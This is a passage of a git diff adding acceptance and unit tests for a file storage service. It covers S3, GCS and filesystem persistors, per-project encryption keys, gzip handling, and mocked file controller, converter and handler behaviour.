prefix', async function () { + await expect( + app.persistor.deleteDirectory( + Settings.filestore.stores.user_files, + projectId.slice(0, 3) + ) + 
).to.be.rejectedWith('not a project-folder') + expect( + await app.persistor.checkIfObjectExists( + Settings.filestore.stores.user_files, + fileKey1 + ) + ).to.equal(true) + await checkGET1() + expect( + await app.persistor.checkIfObjectExists( + Settings.filestore.stores.user_files, + fileKey2 + ) + ).to.equal(true) + expect( + await app.persistor.getDataEncryptionKeySize( + Settings.filestore.stores.user_files, + fileKey2 + ) + ).to.equal(32) + await checkGET2() + }) + it('should delete sub-folder and keep DEK', async function () { + await app.persistor.deleteDirectory( + Settings.filestore.stores.user_files, + fileKey1 // not really a sub-folder, but it will do for this test. + ) + expect( + await app.persistor.checkIfObjectExists( + Settings.filestore.stores.user_files, + fileKey1 + ) + ).to.equal(false) + expect( + await app.persistor.checkIfObjectExists( + Settings.filestore.stores.user_files, + fileKey2 + ) + ).to.equal(true) + expect( + await app.persistor.getDataEncryptionKeySize( + Settings.filestore.stores.user_files, + fileKey2 + ) + ).to.equal(32) + await checkGET2() + }) + it('should delete project folder and DEK', async function () { + await app.persistor.deleteDirectory( + Settings.filestore.stores.user_files, + `${projectId}/` + ) + expect( + await app.persistor.checkIfObjectExists( + Settings.filestore.stores.user_files, + fileKey1 + ) + ).to.equal(false) + expect( + await app.persistor.checkIfObjectExists( + Settings.filestore.stores.user_files, + fileKey2 + ) + ).to.equal(false) + await expect( + app.persistor.getDataEncryptionKeySize( + Settings.filestore.stores.user_files, + fileKey2 + ) + ).to.rejectedWith(NotFoundError) + }) + }) + }) + + describe('getObjectSize', function () { + it('should return a number', async function () { + const buf = Buffer.from('hello') + const fileId = new ObjectId().toString() + const fileUrl = `${filestoreUrl}/project/${projectId}/file/${fileId}` + const res = await fetch(fileUrl, { + method: 'POST', + body: Stream.Readable.from([buf]), + }) + if (!res.ok) throw new Error(res.statusText) + expect( + await app.persistor.getObjectSize( + Settings.filestore.stores.user_files, + `${projectId}/${fileId}` + ) + ).to.equal(buf.byteLength) + }) + }) + + describe('checkIfObjectExists', function () { + it('should return false when the object does not exist', async function () { + expect( + await app.persistor.checkIfObjectExists( + Settings.filestore.stores.user_files, + `${projectId}/${new ObjectId().toString()}` + ) + ).to.equal(false) + }) + it('should return true when the object exists', async function () { + const fileId = new ObjectId().toString() + const fileUrl = `${filestoreUrl}/project/${projectId}/file/${fileId}` + const res = await fetch(fileUrl, { + method: 'POST', + body: Stream.Readable.from(['hello']), + }) + if (!res.ok) throw new Error(res.statusText) + expect( + await app.persistor.checkIfObjectExists( + Settings.filestore.stores.user_files, + `${projectId}/${fileId}` + ) + ).to.equal(true) + }) + }) + + if (backendSettings.backend === 's3SSEC') { + describe('storageClass', function () { + it('should use the default storage class for dek', async function () { + const key = `${projectId}/${new ObjectId()}` + const dekBucket = process.env.AWS_S3_USER_FILES_DEK_BUCKET_NAME + await app.persistor.sendStream( + dekBucket, + key, + Stream.Readable.from(['hello']) + ) + expect( + await app.persistor.getObjectStorageClass(dekBucket, key) + ).to.equal(undefined) + }) + + it('should use the custom storage class for user files', async 
function () {
+        const key = `${projectId}/${new ObjectId()}`
+        await app.persistor.sendStream(
+          Settings.filestore.stores.user_files,
+          key,
+          Stream.Readable.from(['hello'])
+        )
+        const sc = AWS_S3_USER_FILES_STORAGE_CLASS
+        expect(sc).to.exist
+        expect(
+          await app.persistor.getObjectStorageClass(
+            Settings.filestore.stores.user_files,
+            key
+          )
+        ).to.equal(sc)
+      })
+    })
+  }
+
+  describe('autoGunzip', function () {
+    let key
+    beforeEach('new key', function () {
+      key = `${projectId}/${new ObjectId().toString()}`
+    })
+    this.timeout(60 * 1000)
+    const body = Buffer.alloc(10 * 1024 * 1024, 'hello')
+    const gzippedBody = gzipSync(body)
+
+    /**
+     * @param {string} key
+     * @param {Buffer} wantBody
+     * @param {boolean} autoGunzip
+     * @return {Promise<void>}
+     */
+    async function checkBodyIsTheSame(key, wantBody, autoGunzip) {
+      const s = await app.persistor.getObjectStream(
+        Settings.filestore.stores.user_files,
+        key,
+        { autoGunzip }
+      )
+      const buf = new WritableBuffer()
+      await Stream.promises.pipeline(s, buf)
+      expect(buf.getContents()).to.deep.equal(wantBody)
+    }
+
+    if (backendSettings.backend === 'fs') {
+      it('should refuse to handle autoGunzip', async function () {
+        await expect(
+          app.persistor.getObjectStream(
+            Settings.filestore.stores.user_files,
+            key,
+            { autoGunzip: true }
+          )
+        ).to.be.rejectedWith(NotImplementedError)
+      })
+    } else {
+      it('should return the raw body with gzip', async function () {
+        await app.persistor.sendStream(
+          Settings.filestore.stores.user_files,
+          key,
+          Stream.Readable.from([gzippedBody]),
+          { contentEncoding: 'gzip' }
+        )
+        expect(
+          await app.persistor.getObjectSize(
+            Settings.filestore.stores.user_files,
+            key
+          )
+        ).to.equal(gzippedBody.byteLength)
+        // raw body with autoGunzip=true
+        await checkBodyIsTheSame(key, body, true)
+        // gzip body with autoGunzip=false
+        await checkBodyIsTheSame(key, gzippedBody, false)
+      })
+      it('should return the raw body without gzip compression', async function () {
+        await app.persistor.sendStream(
+          Settings.filestore.stores.user_files,
+          key,
+          Stream.Readable.from([body])
+        )
+        expect(
+          await app.persistor.getObjectSize(
+            Settings.filestore.stores.user_files,
+            key
+          )
+        ).to.equal(body.byteLength)
+        // raw body with both autoGunzip options
+        await checkBodyIsTheSame(key, body, true)
+        await checkBodyIsTheSame(key, body, false)
+      })
+
+      it('should return the gzip body without gzip header', async function () {
+        await app.persistor.sendStream(
+          Settings.filestore.stores.user_files,
+          key,
+          Stream.Readable.from([gzippedBody])
+        )
+        expect(
+          await app.persistor.getObjectSize(
+            Settings.filestore.stores.user_files,
+            key
+          )
+        ).to.equal(gzippedBody.byteLength)
+        // gzip body with both autoGunzip options
+        await checkBodyIsTheSame(key, gzippedBody, true)
+        await checkBodyIsTheSame(key, gzippedBody, false)
+      })
+    }
+  })
+  })
+  }
+})
diff --git a/services/filestore/test/acceptance/js/TestConfig.js b/services/filestore/test/acceptance/js/TestConfig.js
new file mode 100644
index 0000000..3ad4ba4
--- /dev/null
+++ b/services/filestore/test/acceptance/js/TestConfig.js
@@ -0,0 +1,192 @@
+const fs = require('node:fs')
+const Path = require('node:path')
+const crypto = require('node:crypto')
+const {
+  RootKeyEncryptionKey,
+} = require('@overleaf/object-persistor/src/PerProjectEncryptedS3Persistor')
+
+const AWS_S3_USER_FILES_STORAGE_CLASS =
+  process.env.AWS_S3_USER_FILES_STORAGE_CLASS
+
+// use functions to get a fresh copy, not a reference, each time
+function s3BaseConfig() {
+  return {
+    endpoint: 
process.env.AWS_S3_ENDPOINT, + pathStyle: true, + partSize: 100 * 1024 * 1024, + ca: [fs.readFileSync('/certs/public.crt')], + } +} + +function s3Config() { + return { + key: process.env.AWS_ACCESS_KEY_ID, + secret: process.env.AWS_SECRET_ACCESS_KEY, + ...s3BaseConfig(), + } +} + +const S3SSECKeys = [ + new RootKeyEncryptionKey( + crypto.generateKeySync('aes', { length: 256 }).export(), + Buffer.alloc(32) + ), +] + +function s3SSECConfig() { + return { + ...s3Config(), + ignoreErrorsFromDEKReEncryption: false, + automaticallyRotateDEKEncryption: true, + dataEncryptionKeyBucketName: process.env.AWS_S3_USER_FILES_DEK_BUCKET_NAME, + pathToProjectFolder(_bucketName, path) { + const match = path.match(/^[a-f0-9]{24}\//) + if (!match) throw new Error('not a project-folder') + const [projectFolder] = match + return projectFolder + }, + async getRootKeyEncryptionKeys() { + return S3SSECKeys + }, + storageClass: { + [process.env.AWS_S3_USER_FILES_BUCKET_NAME]: + AWS_S3_USER_FILES_STORAGE_CLASS, + }, + } +} + +function s3ConfigDefaultProviderCredentials() { + return { + ...s3BaseConfig(), + } +} + +function s3Stores() { + return { + user_files: process.env.AWS_S3_USER_FILES_BUCKET_NAME, + template_files: process.env.AWS_S3_TEMPLATE_FILES_BUCKET_NAME, + } +} + +function gcsConfig() { + return { + endpoint: { + apiEndpoint: process.env.GCS_API_ENDPOINT, + projectId: 'fake', + }, + directoryKeyRegex: /^[0-9a-fA-F]{24}\/[0-9a-fA-F]{24}/, + unlockBeforeDelete: false, // fake-gcs does not support this + deletedBucketSuffix: '-deleted', + } +} + +function gcsStores() { + return { + user_files: process.env.GCS_USER_FILES_BUCKET_NAME, + template_files: process.env.GCS_TEMPLATE_FILES_BUCKET_NAME, + } +} + +function fsStores() { + return { + user_files: Path.resolve(__dirname, '../../../user_files'), + template_files: Path.resolve(__dirname, '../../../template_files'), + } +} + +function fallbackStores(primaryConfig, fallbackConfig) { + return { + [primaryConfig.user_files]: fallbackConfig.user_files, + [primaryConfig.template_files]: fallbackConfig.template_files, + } +} + +const BackendSettings = { + SHARD_01_FSPersistor: { + backend: 'fs', + stores: fsStores(), + }, + SHARD_01_S3Persistor: { + backend: 's3', + s3: s3Config(), + stores: s3Stores(), + }, + SHARD_01_S3PersistorDefaultProviderCredentials: { + backend: 's3', + s3: s3ConfigDefaultProviderCredentials(), + stores: s3Stores(), + }, + SHARD_01_GcsPersistor: { + backend: 'gcs', + gcs: gcsConfig(), + stores: gcsStores(), + }, + SHARD_01_PerProjectEncryptedS3Persistor: { + backend: 's3SSEC', + s3SSEC: s3SSECConfig(), + stores: s3Stores(), + }, + SHARD_02_FallbackS3ToFSPersistor: { + backend: 's3', + s3: s3Config(), + stores: s3Stores(), + fallback: { + backend: 'fs', + buckets: fallbackStores(s3Stores(), fsStores()), + }, + }, + SHARD_02_FallbackFSToS3Persistor: { + backend: 'fs', + s3: s3Config(), + stores: fsStores(), + fallback: { + backend: 's3', + buckets: fallbackStores(fsStores(), s3Stores()), + }, + }, + SHARD_03_FallbackGcsToS3Persistor: { + backend: 'gcs', + gcs: gcsConfig(), + stores: gcsStores(), + s3: s3Config(), + fallback: { + backend: 's3', + buckets: fallbackStores(gcsStores(), s3Stores()), + }, + }, + SHARD_03_FallbackS3ToGcsPersistor: { + backend: 's3', + // can use the same bucket names for gcs and s3 (in tests) + stores: s3Stores(), + s3: s3Config(), + gcs: gcsConfig(), + fallback: { + backend: 'gcs', + buckets: fallbackStores(s3Stores(), gcsStores()), + }, + }, +} + +function checkForUnexpectedTestFile() { + const awareOfSharding = 
[ + 'FilestoreApp.js', + 'FilestoreTests.js', + 'TestConfig.js', + 'TestHelper.js', + ] + for (const file of fs.readdirSync(__dirname).sort()) { + if (!awareOfSharding.includes(file)) { + throw new Error( + `Found new test file ${file}: All tests must be aware of the SHARD_ prefix.` + ) + } + } +} +checkForUnexpectedTestFile() + +module.exports = { + AWS_S3_USER_FILES_STORAGE_CLASS, + BackendSettings, + s3Config, + s3SSECConfig, +} diff --git a/services/filestore/test/acceptance/js/TestHelper.js b/services/filestore/test/acceptance/js/TestHelper.js new file mode 100644 index 0000000..384f8aa --- /dev/null +++ b/services/filestore/test/acceptance/js/TestHelper.js @@ -0,0 +1,78 @@ +const streamifier = require('streamifier') +const fetch = require('node-fetch') +const ObjectPersistor = require('@overleaf/object-persistor') + +const { expect } = require('chai') + +module.exports = { + uploadStringToPersistor, + getStringFromPersistor, + expectPersistorToHaveFile, + expectPersistorToHaveSomeFile, + expectPersistorNotToHaveFile, + streamToString, + getMetric, +} + +async function getMetric(filestoreUrl, metric) { + const res = await fetch(`${filestoreUrl}/metrics`) + expect(res.status).to.equal(200) + const metricRegex = new RegExp(`^${metric}{[^}]+} ([0-9]+)$`, 'gm') + const body = await res.text() + let v = 0 + // Sum up size="lt-128KiB" and size="gte-128KiB" + for (const [, found] of body.matchAll(metricRegex)) { + v += parseInt(found, 10) || 0 + } + return v +} + +function streamToString(stream) { + const chunks = [] + return new Promise((resolve, reject) => { + stream.on('data', chunk => chunks.push(chunk)) + stream.on('error', reject) + stream.on('end', () => resolve(Buffer.concat(chunks).toString('utf8'))) + stream.resume() + }) +} + +async function uploadStringToPersistor(persistor, bucket, key, content) { + const fileStream = streamifier.createReadStream(content) + await persistor.sendStream(bucket, key, fileStream) +} + +async function getStringFromPersistor(persistor, bucket, key) { + const stream = await persistor.getObjectStream(bucket, key, {}) + return await streamToString(stream) +} + +async function expectPersistorToHaveFile(persistor, bucket, key, content) { + const foundContent = await getStringFromPersistor(persistor, bucket, key) + expect(foundContent).to.equal(content) +} + +async function expectPersistorToHaveSomeFile(persistor, bucket, keys, content) { + let foundContent + for (const key of keys) { + try { + foundContent = await getStringFromPersistor(persistor, bucket, key) + break + } catch (err) { + if (err instanceof ObjectPersistor.Errors.NotFoundError) { + continue + } + throw err + } + } + if (foundContent === undefined) { + expect.fail(`Could not find any of the specified keys: ${keys}`) + } + expect(foundContent).to.equal(content) +} + +async function expectPersistorNotToHaveFile(persistor, bucket, key) { + await expect( + getStringFromPersistor(persistor, bucket, key) + ).to.eventually.have.been.rejected.with.property('name', 'NotFoundError') +} diff --git a/services/filestore/test/fixtures/test.pdf b/services/filestore/test/fixtures/test.pdf new file mode 100644 index 0000000..b021cc1 Binary files /dev/null and b/services/filestore/test/fixtures/test.pdf differ diff --git a/services/filestore/test/setup.js b/services/filestore/test/setup.js new file mode 100644 index 0000000..744ab91 --- /dev/null +++ b/services/filestore/test/setup.js @@ -0,0 +1,39 @@ +const sinon = require('sinon') +const SandboxedModule = require('sandboxed-module') + +// ensure every 
ObjectId has the id string as a property for correct comparisons +require('mongodb').ObjectId.cacheHexString = true + +const sandbox = sinon.createSandbox() +const stubs = { + logger: { + debug: sandbox.stub(), + log: sandbox.stub(), + info: sandbox.stub(), + warn: sandbox.stub(), + err: sandbox.stub(), + error: sandbox.stub(), + fatal: sandbox.stub(), + }, +} + +SandboxedModule.configure({ + requires: { + '@overleaf/logger': stubs.logger, + }, + sourceTransformers: { + removeNodePrefix: function (source) { + return source.replace(/require\(['"]node:/g, "require('") + }, + }, +}) + +exports.mochaHooks = { + beforeEach() { + this.logger = stubs.logger + }, + + afterEach() { + sandbox.reset() + }, +} diff --git a/services/filestore/test/unit/js/FileControllerTests.js b/services/filestore/test/unit/js/FileControllerTests.js new file mode 100644 index 0000000..ec56211 --- /dev/null +++ b/services/filestore/test/unit/js/FileControllerTests.js @@ -0,0 +1,336 @@ +const sinon = require('sinon') +const chai = require('chai') +const { expect } = chai +const SandboxedModule = require('sandboxed-module') +const Errors = require('../../../app/js/Errors') +const modulePath = '../../../app/js/FileController.js' + +describe('FileController', function () { + let FileHandler, LocalFileWriter, FileController, req, res, next, stream + const settings = { + s3: { + buckets: { + user_files: 'user_files', + }, + }, + } + const fileSize = 1234 + const fileStream = { + destroy() {}, + } + const projectId = 'projectId' + const fileId = 'file_id' + const bucket = 'user_files' + const key = `${projectId}/${fileId}` + const error = new Error('incorrect utensil') + + beforeEach(function () { + FileHandler = { + copyObject: sinon.stub().yields(), + getFile: sinon.stub().yields(null, fileStream), + getFileSize: sinon.stub().yields(null, fileSize), + deleteFile: sinon.stub().yields(), + deleteProject: sinon.stub().yields(), + insertFile: sinon.stub().yields(), + getDirectorySize: sinon.stub().yields(null, fileSize), + getRedirectUrl: sinon.stub().yields(null, null), + } + + LocalFileWriter = {} + stream = { + pipeline: sinon.stub(), + } + + FileController = SandboxedModule.require(modulePath, { + requires: { + './LocalFileWriter': LocalFileWriter, + './FileHandler': FileHandler, + './Errors': Errors, + stream, + '@overleaf/settings': settings, + '@overleaf/metrics': { + inc() {}, + }, + }, + globals: { console }, + }) + + req = { + key, + bucket, + project_id: projectId, + query: {}, + params: { + project_id: projectId, + file_id: fileId, + }, + headers: {}, + requestLogger: { + setMessage: sinon.stub(), + addFields: sinon.stub(), + }, + } + + res = { + set: sinon.stub().returnsThis(), + sendStatus: sinon.stub().returnsThis(), + status: sinon.stub().returnsThis(), + } + + next = sinon.stub() + }) + + describe('getFile', function () { + it('should try and get a redirect url first', function () { + FileController.getFile(req, res, next) + expect(FileHandler.getRedirectUrl).to.have.been.calledWith(bucket, key) + }) + + it('should pipe the stream', function () { + FileController.getFile(req, res, next) + expect(stream.pipeline).to.have.been.calledWith(fileStream, res) + }) + + it('should send a 200 if the cacheWarm param is true', function (done) { + req.query.cacheWarm = true + res.sendStatus = statusCode => { + statusCode.should.equal(200) + done() + } + FileController.getFile(req, res, next) + }) + + it('should send an error if there is a problem', function () { + FileHandler.getFile.yields(error) + 
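+      // the stubbed FileHandler now fails, so the error should be forwarded to next()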
FileController.getFile(req, res, next)
+      expect(next).to.have.been.calledWith(error)
+    })
+
+    describe('with a redirect url', function () {
+      const redirectUrl = 'https://wombat.potato/giraffe'
+
+      beforeEach(function () {
+        FileHandler.getRedirectUrl.yields(null, redirectUrl)
+        res.redirect = sinon.stub()
+      })
+
+      it('should redirect', function () {
+        FileController.getFile(req, res, next)
+        expect(res.redirect).to.have.been.calledWith(redirectUrl)
+      })
+
+      it('should not get a file stream', function () {
+        FileController.getFile(req, res, next)
+        expect(FileHandler.getFile).not.to.have.been.called
+      })
+
+      describe('when there is an error getting the redirect url', function () {
+        beforeEach(function () {
+          FileHandler.getRedirectUrl.yields(new Error('wombat herding error'))
+        })
+
+        it('should not redirect', function () {
+          FileController.getFile(req, res, next)
+          expect(res.redirect).not.to.have.been.called
+        })
+
+        it('should not return an error', function () {
+          FileController.getFile(req, res, next)
+          expect(next).not.to.have.been.called
+        })
+
+        it('should proxy the file', function () {
+          FileController.getFile(req, res, next)
+          expect(FileHandler.getFile).to.have.been.calledWith(bucket, key)
+        })
+      })
+    })
+
+    describe('with a range header', function () {
+      let expectedOptions
+
+      beforeEach(function () {
+        expectedOptions = {
+          bucket,
+          key,
+          format: undefined,
+          style: undefined,
+        }
+      })
+
+      it('should pass range options to FileHandler', function () {
+        req.headers.range = 'bytes=0-8'
+        expectedOptions.start = 0
+        expectedOptions.end = 8
+
+        FileController.getFile(req, res, next)
+        expect(FileHandler.getFile).to.have.been.calledWith(
+          bucket,
+          key,
+          expectedOptions
+        )
+      })
+
+      it('should ignore an invalid range header', function () {
+        req.headers.range = 'potato'
+        FileController.getFile(req, res, next)
+        expect(FileHandler.getFile).to.have.been.calledWith(
+          bucket,
+          key,
+          expectedOptions
+        )
+      })
+
+      it("should ignore any type other than 'bytes'", function () {
+        req.headers.range = 'wombats=0-8'
+        FileController.getFile(req, res, next)
+        expect(FileHandler.getFile).to.have.been.calledWith(
+          bucket,
+          key,
+          expectedOptions
+        )
+      })
+    })
+  })
+
+  describe('getFileHead', function () {
+    it('should return the file size in a Content-Length header', function (done) {
+      res.end = () => {
+        expect(res.status).to.have.been.calledWith(200)
+        expect(res.set).to.have.been.calledWith('Content-Length', fileSize)
+        done()
+      }
+
+      FileController.getFileHead(req, res, next)
+    })
+
+    it('should return a 404 if the file is not found', function (done) {
+      FileHandler.getFileSize.yields(
+        new Errors.NotFoundError({ message: 'not found', info: {} })
+      )
+
+      res.sendStatus = code => {
+        expect(code).to.equal(404)
+        done()
+      }
+
+      FileController.getFileHead(req, res, next)
+    })
+
+    it('should send an error on internal errors', function () {
+      FileHandler.getFileSize.yields(error)
+
+      FileController.getFileHead(req, res, next)
+      expect(next).to.have.been.calledWith(error)
+    })
+  })
+
+  describe('insertFile', function () {
+    it('should send bucket name, key and req to FileHandler', function (done) {
+      res.sendStatus = code => {
+        expect(FileHandler.insertFile).to.have.been.calledWith(bucket, key, req)
+        expect(code).to.equal(200)
+        done()
+      }
+      FileController.insertFile(req, res, next)
+    })
+  })
+
+  describe('copyFile', function () {
+    const oldFileId = 'oldFileId'
+    const oldProjectId = 'oldProjectid'
+    const oldKey = `${oldProjectId}/${oldFileId}`
+
+    beforeEach(function () {
+      req.body 
= { + source: { + project_id: oldProjectId, + file_id: oldFileId, + }, + } + }) + + it('should send bucket name and both keys to FileHandler', function (done) { + res.sendStatus = code => { + code.should.equal(200) + expect(FileHandler.copyObject).to.have.been.calledWith( + bucket, + oldKey, + key + ) + done() + } + FileController.copyFile(req, res, next) + }) + + it('should send a 404 if the original file was not found', function (done) { + FileHandler.copyObject.yields( + new Errors.NotFoundError({ message: 'not found', info: {} }) + ) + res.sendStatus = code => { + code.should.equal(404) + done() + } + FileController.copyFile(req, res, next) + }) + + it('should send an error if there was an error', function (done) { + FileHandler.copyObject.yields(error) + FileController.copyFile(req, res, err => { + expect(err).to.equal(error) + done() + }) + }) + }) + + describe('delete file', function () { + it('should tell the file handler', function (done) { + res.sendStatus = code => { + code.should.equal(204) + expect(FileHandler.deleteFile).to.have.been.calledWith(bucket, key) + done() + } + FileController.deleteFile(req, res, next) + }) + + it('should send a 500 if there was an error', function () { + FileHandler.deleteFile.yields(error) + FileController.deleteFile(req, res, next) + expect(next).to.have.been.calledWith(error) + }) + }) + + describe('delete project', function () { + it('should tell the file handler', function (done) { + res.sendStatus = code => { + code.should.equal(204) + expect(FileHandler.deleteProject).to.have.been.calledWith(bucket, key) + done() + } + FileController.deleteProject(req, res, next) + }) + + it('should send a 500 if there was an error', function () { + FileHandler.deleteProject.yields(error) + FileController.deleteProject(req, res, next) + expect(next).to.have.been.calledWith(error) + }) + }) + + describe('directorySize', function () { + it('should return total directory size bytes', function (done) { + FileController.directorySize(req, { + json: result => { + expect(result['total bytes']).to.equal(fileSize) + done() + }, + }) + }) + + it('should send a 500 if there was an error', function () { + FileHandler.getDirectorySize.yields(error) + FileController.directorySize(req, res, next) + expect(next).to.have.been.calledWith(error) + }) + }) +}) diff --git a/services/filestore/test/unit/js/FileConverterTests.js b/services/filestore/test/unit/js/FileConverterTests.js new file mode 100644 index 0000000..131bead --- /dev/null +++ b/services/filestore/test/unit/js/FileConverterTests.js @@ -0,0 +1,107 @@ +const sinon = require('sinon') +const chai = require('chai') +const { expect } = chai +const SandboxedModule = require('sandboxed-module') +const { Errors } = require('@overleaf/object-persistor') + +const modulePath = '../../../app/js/FileConverter.js' + +describe('FileConverter', function () { + let SafeExec, FileConverter + const sourcePath = '/data/wombat.eps' + const destPath = '/tmp/dest.png' + const format = 'png' + const errorMessage = 'guru meditation error' + const Settings = { + commands: { + convertCommandPrefix: [], + }, + } + + beforeEach(function () { + SafeExec = { + promises: sinon.stub().resolves(destPath), + } + + const ObjectPersistor = { Errors } + + FileConverter = SandboxedModule.require(modulePath, { + requires: { + './SafeExec': SafeExec, + '@overleaf/metrics': { + inc: sinon.stub(), + Timer: sinon.stub().returns({ done: sinon.stub() }), + }, + '@overleaf/settings': Settings, + '@overleaf/object-persistor': ObjectPersistor, + }, + }) + }) + 
+
+  describe('convert', function () {
+    it('should convert the source to the requested format', async function () {
+      await FileConverter.promises.convert(sourcePath, format)
+      const args = SafeExec.promises.args[0][0]
+      expect(args).to.include(`${sourcePath}[0]`)
+      expect(args).to.include(`${sourcePath}.${format}`)
+    })
+
+    it('should return the dest path', async function () {
+      const destPath = await FileConverter.promises.convert(sourcePath, format)
+      destPath.should.equal(`${sourcePath}.${format}`)
+    })
+
+    it('should wrap the error from convert', async function () {
+      SafeExec.promises.rejects(errorMessage)
+      try {
+        await FileConverter.promises.convert(sourcePath, format)
+        expect('error should have been thrown').not.to.exist
+      } catch (err) {
+        expect(err.name).to.equal('ConversionError')
+        expect(err.cause.toString()).to.equal(errorMessage)
+      }
+    })
+
+    it('should not accept a non-approved format', async function () {
+      try {
+        await FileConverter.promises.convert(sourcePath, 'potato')
+        expect('error should have been thrown').not.to.exist
+      } catch (err) {
+        expect(err.name).to.equal('ConversionError')
+      }
+    })
+
+    it('should prefix the command with Settings.commands.convertCommandPrefix', async function () {
+      Settings.commands.convertCommandPrefix = ['nice']
+      await FileConverter.promises.convert(sourcePath, format)
+    })
+
+    it('should convert the file when called as a callback', function (done) {
+      FileConverter.convert(sourcePath, format, (err, destPath) => {
+        expect(err).not.to.exist
+        destPath.should.equal(`${sourcePath}.${format}`)
+
+        const args = SafeExec.promises.args[0][0]
+        expect(args).to.include(`${sourcePath}[0]`)
+        expect(args).to.include(`${sourcePath}.${format}`)
+        done()
+      })
+    })
+  })
+
+  describe('thumbnail', function () {
+    it('should call converter resize with args', async function () {
+      await FileConverter.promises.thumbnail(sourcePath)
+      const args = SafeExec.promises.args[0][0]
+      expect(args).to.include(`${sourcePath}[0]`)
+    })
+  })
+
+  describe('preview', function () {
+    it('should call converter resize with args', async function () {
+      await FileConverter.promises.preview(sourcePath)
+      const args = SafeExec.promises.args[0][0]
+      expect(args).to.include(`${sourcePath}[0]`)
+    })
+  })
+})
diff --git a/services/filestore/test/unit/js/FileHandlerTests.js b/services/filestore/test/unit/js/FileHandlerTests.js
new file mode 100644
index 0000000..12a2366
--- /dev/null
+++ b/services/filestore/test/unit/js/FileHandlerTests.js
@@ -0,0 +1,405 @@
+const sinon = require('sinon')
+const chai = require('chai')
+const { expect } = chai
+const modulePath = '../../../app/js/FileHandler.js'
+const SandboxedModule = require('sandboxed-module')
+const { ObjectId } = require('mongodb')
+const { Errors } = require('@overleaf/object-persistor')
+
+chai.use(require('sinon-chai'))
+chai.use(require('chai-as-promised'))
+
+describe('FileHandler', function () {
+  let PersistorManager,
+    LocalFileWriter,
+    FileConverter,
+    KeyBuilder,
+    ImageOptimiser,
+    FileHandler,
+    Settings,
+    fs
+
+  const bucket = 'my_bucket'
+  const key = `${new ObjectId()}/${new ObjectId()}`
+  const convertedFolderKey = `${new ObjectId()}/${new ObjectId()}`
+  const projectKey = `${new ObjectId()}/`
+  const sourceStream = 'sourceStream'
+  const convertedKey = 'convertedKey'
+  const redirectUrl = 'https://wombat.potato/giraffe'
+  const readStream = {
+    stream: 'readStream',
+    on: sinon.stub(),
+  }
+
+  beforeEach(function () {
+    PersistorManager = {
+      getObjectStream: sinon.stub().resolves(sourceStream),
+      
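+      // the remaining persistor operations resolve successfully by default; individual tests override them as needed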
getRedirectUrl: sinon.stub().resolves(redirectUrl), + checkIfObjectExists: sinon.stub().resolves(), + deleteObject: sinon.stub().resolves(), + deleteDirectory: sinon.stub().resolves(), + sendStream: sinon.stub().resolves(), + insertFile: sinon.stub().resolves(), + sendFile: sinon.stub().resolves(), + directorySize: sinon.stub().resolves(), + } + LocalFileWriter = { + // the callback style is used for detached cleanup calls + deleteFile: sinon.stub().yields(), + promises: { + writeStream: sinon.stub().resolves(), + deleteFile: sinon.stub().resolves(), + }, + } + FileConverter = { + promises: { + convert: sinon.stub().resolves(), + thumbnail: sinon.stub().resolves(), + preview: sinon.stub().resolves(), + }, + } + KeyBuilder = { + addCachingToKey: sinon.stub().returns(convertedKey), + getConvertedFolderKey: sinon.stub().returns(convertedFolderKey), + } + ImageOptimiser = { + promises: { + compressPng: sinon.stub().resolves(), + }, + } + Settings = { + filestore: { + stores: { template_files: 'template_files', user_files: 'user_files' }, + }, + } + fs = { + createReadStream: sinon.stub().returns(readStream), + } + + const ObjectPersistor = { Errors } + + FileHandler = SandboxedModule.require(modulePath, { + requires: { + './PersistorManager': PersistorManager, + './LocalFileWriter': LocalFileWriter, + './FileConverter': FileConverter, + './KeyBuilder': KeyBuilder, + './ImageOptimiser': ImageOptimiser, + '@overleaf/settings': Settings, + '@overleaf/object-persistor': ObjectPersistor, + '@overleaf/metrics': { + gauge: sinon.stub(), + Timer: sinon.stub().returns({ done: sinon.stub() }), + }, + fs, + }, + globals: { console, process }, + }) + }) + + describe('insertFile', function () { + const stream = 'stream' + + it('should send file to the filestore', function (done) { + FileHandler.insertFile(bucket, key, stream, err => { + expect(err).not.to.exist + expect(PersistorManager.sendStream).to.have.been.calledWith( + bucket, + key, + stream + ) + done() + }) + }) + + it('should not make a delete request for the convertedKey folder', function (done) { + FileHandler.insertFile(bucket, key, stream, err => { + expect(err).not.to.exist + expect(PersistorManager.deleteDirectory).not.to.have.been.called + done() + }) + }) + + it('should accept templates-api key format', function (done) { + KeyBuilder.getConvertedFolderKey.returns( + '5ecba29f1a294e007d0bccb4/v/0/pdf' + ) + FileHandler.insertFile(bucket, key, stream, err => { + expect(err).not.to.exist + done() + }) + }) + + it('should throw an error when the key is in the wrong format', function (done) { + KeyBuilder.getConvertedFolderKey.returns('wombat') + FileHandler.insertFile(bucket, key, stream, err => { + expect(err).to.exist + done() + }) + }) + }) + + describe('deleteFile', function () { + it('should tell the filestore manager to delete the file', function (done) { + FileHandler.deleteFile(bucket, key, err => { + expect(err).not.to.exist + expect(PersistorManager.deleteObject).to.have.been.calledWith( + bucket, + key + ) + done() + }) + }) + + it('should not tell the filestore manager to delete the cached folder', function (done) { + FileHandler.deleteFile(bucket, key, err => { + expect(err).not.to.exist + expect(PersistorManager.deleteDirectory).not.to.have.been.called + done() + }) + }) + + it('should accept templates-api key format', function (done) { + KeyBuilder.getConvertedFolderKey.returns( + '5ecba29f1a294e007d0bccb4/v/0/pdf' + ) + FileHandler.deleteFile(bucket, key, err => { + expect(err).not.to.exist + done() + }) + }) + + it('should 
throw an error when the key is in the wrong format', function (done) {
+      KeyBuilder.getConvertedFolderKey.returns('wombat')
+      FileHandler.deleteFile(bucket, key, err => {
+        expect(err).to.exist
+        done()
+      })
+    })
+
+    describe('when conversions are enabled', function () {
+      beforeEach(function () {
+        Settings.enableConversions = true
+      })
+
+      it('should delete the convertedKey folder for template files', function (done) {
+        FileHandler.deleteFile(
+          Settings.filestore.stores.template_files,
+          key,
+          err => {
+            expect(err).not.to.exist
+            expect(PersistorManager.deleteDirectory).to.have.been.calledWith(
+              Settings.filestore.stores.template_files,
+              convertedFolderKey
+            )
+            done()
+          }
+        )
+      })
+
+      it('should not delete the convertedKey folder for user files', function (done) {
+        FileHandler.deleteFile(
+          Settings.filestore.stores.user_files,
+          key,
+          err => {
+            expect(err).not.to.exist
+            expect(PersistorManager.deleteDirectory).to.not.have.been.called
+            done()
+          }
+        )
+      })
+    })
+  })
+
+  describe('deleteProject', function () {
+    it('should tell the filestore manager to delete the folder', function (done) {
+      FileHandler.deleteProject(bucket, projectKey, err => {
+        expect(err).not.to.exist
